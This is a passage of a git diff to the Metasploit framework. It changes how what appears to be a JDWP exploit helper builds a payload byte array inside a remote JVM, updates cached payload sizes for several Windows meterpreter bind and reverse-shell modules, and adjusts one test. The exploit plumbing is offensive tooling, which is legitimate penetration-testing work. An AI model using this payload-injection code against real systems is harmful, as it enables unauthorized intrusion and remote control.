-      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
-    end
-    buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
-    unless buf[0] == [TAG_ARRAY].pack('C')
-      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")
-    end
+    buf = create_array(pl_exe.length)
+    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
 
     pl = unformat(size, buf[1..1+size-1])
+    fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
+
+    set_values(pl, pl_exe.bytes)
     pl
   end
 
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index bcc228198a..3cf4270eea 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 883358
+  CachedSize = 884270
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index ed676b0b04..d896a4dae2 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884402
+  CachedSize = 885314
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 2747be9ec3..241bb19f9b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884402
+  CachedSize = 885314
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 8d330fddbf..efab821ffc 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 883358
+  CachedSize = 884270
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 98b83de831..7e1b2a0789 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit3
 
-  CachedSize = 883358
+  CachedSize = 884270
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index db49e198cc..6fa749697b 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102498
+  CachedSize = 1102898
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index e2cf2c9619..8fbb63b9a0 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1103542
+  CachedSize = 1103942
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 3a5ab8e7d1..65bdd0ad74 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1103542
+  CachedSize = 1103942
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index 7dc3db89f7..22650c4a37 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102498
+  CachedSize = 1102898
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 81e3cd6511..55a7acbceb 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102498
+  CachedSize = 1102898
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb
index f6b496d3c5..a61ab5f9e5 100644
--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -606,7 +606,7 @@ describe Msf::PayloadGenerator do
       }
 
       it 'calls generate_java_payload' do
-        payload_generator.should_receive(:generate_java_payload)
+        payload_generator.should_receive(:generate_java_payload).and_call_original
         payload_generator.generate_payload
       end
     end